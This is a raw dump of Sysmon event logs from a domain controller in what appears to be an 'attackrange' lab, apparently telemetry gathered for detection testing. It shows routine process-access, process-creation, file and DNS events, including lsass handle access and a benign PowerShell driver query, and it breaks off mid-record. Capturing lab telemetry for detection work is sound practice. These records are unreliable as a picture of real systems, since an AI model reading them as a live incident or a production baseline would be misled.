10341000x80000000000000002421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5F-6005-7000-00000000A301}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.798{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5F-6005-7000-00000000A301}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.601{59A5CD1D-8E5F-6005-7000-00000000A301}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.298{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.095{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.095{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.033{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_3ynrvq0w.kpa.ps12021-01-18 13:34:23.033 10341000x80000000000000002411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.014{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000002410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.846{59A5CD1D-8E56-6005-2E00-00000000A301}2464c.f.f.c.4.5.d.0.2.5.d.0.d.6.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 10341000x80000000000000002409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.003{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.002{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.002{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.000{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.000{59A5CD1D-8E5B-6005-5500-00000000A301}37483704C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.000{59A5CD1D-8E5F-6005-6F00-00000000A301}3372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPSignedDriver | Where-Object { $_.DeviceID -eq 'XENBUS\VEN_XS0001&DEV_VBD&REV_00000001\_' -or $_.DeviceClass -eq 'Net' -and ( $_.Manufacturer -like 'Intel*' -or $_.Manufacturer -eq 'Citrix Systems, Inc.' -or $_.Manufacturer -eq 'Amazon Inc.' -or $_.Manufacturer -eq 'Amazon Web Services, Inc.' )}" "| Select-Object" "Description, DriverVersion" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 